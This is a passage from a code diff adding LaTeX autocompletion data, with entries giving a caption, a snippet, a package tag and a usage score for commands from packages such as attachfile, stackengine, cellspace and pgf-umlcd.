'\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'attachfile-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'attachfile-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'attachfile-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'attachfile-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'attachfile-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'attachfile-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'attachfile-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'attachfile-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'attachfile-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'attachfile-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'attachfile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'attachfile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'attachfile-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'attachfile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'attachfile-cmd', + score: 0.00530510025314411, + }, + ], + doc: [ + { + caption: '\\do', + snippet: '\\do', + meta: 'doc-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\verb', + snippet: '\\verb', + meta: 'doc-cmd', + score: 0.1323269725886312, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'doc-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\verbatim', + snippet: '\\verbatim', + meta: 'doc-cmd', + score: 0.0072203369120285256, + }, + ], + 'tkz-fct': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\reserveinserts{}', + snippet: '\\reserveinserts{$1}', + meta: 'tkz-fct-cmd', + score: 0.0018653410309739879, + }, + { + caption: '\\newtoks', + snippet: '\\newtoks', + meta: 'tkz-fct-cmd', + score: 0.00031058155311734754, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tkz-fct-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tkz-fct-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tkz-fct-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-fct-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tkz-fct-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tkz-fct-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tkz-fct-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tkz-fct-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tkz-fct-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tkz-fct-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tkz-fct-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tkz-fct-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tkz-fct-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tkz-fct-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tkz-fct-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tkz-fct-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tkz-fct-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tkz-fct-cmd', + score: 0.2864294797053033, + }, + ], + notes2bib: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'notes2bib-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'notes2bib-cmd', + score: 0.2864294797053033, + }, + ], + stackengine: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'stackengine-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'stackengine-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'stackengine-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'stackengine-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'stackengine-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'stackengine-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'stackengine-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'stackengine-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'stackengine-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'stackengine-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'stackengine-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'stackengine-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'stackengine-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'stackengine-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'stackengine-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'stackengine-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'stackengine-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'stackengine-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'stackengine-cmd', + score: 0.008565354665444157, + }, + ], + cellspace: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'cellspace-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'cellspace-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'cellspace-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'cellspace-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'cellspace-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cellspace-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'cellspace-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'cellspace-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'cellspace-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'cellspace-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'cellspace-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'cellspace-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'cellspace-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'cellspace-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'cellspace-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'cellspace-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'cellspace-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'cellspace-cmd', + score: 0.028955796305270766, + }, + ], + zxjatype: [ + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'zxjatype-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'zxjatype-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'zxjatype-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'zxjatype-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'zxjatype-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'zxjatype-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'zxjatype-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'zxjatype-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'zxjatype-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'zxjatype-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zxjatype-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'zxjatype-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'zxjatype-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'zxjatype-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'zxjatype-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zxjatype-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'zxjatype-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'zxjatype-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'zxjatype-cmd', + score: 0.2864294797053033, + }, + ], + newclude: [ + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'newclude-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'newclude-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\include{}', + snippet: '\\include{$1}', + meta: 'newclude-cmd', + score: 0.1547080054979312, + }, + ], + 'pgf-umlcd': [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgf-umlcd-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgf-umlcd-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlcd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgf-umlcd-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgf-umlcd-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgf-umlcd-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgf-umlcd-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgf-umlcd-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgf-umlcd-cmd', + score: 0.2864294797053033, + }, + ], + 'thm-listof': [ + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thm-listof-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + meta: 'thm-listof-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thm-listof-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thm-listof-cmd', + score: 0.00037306820619479756, + }, + { + caption: 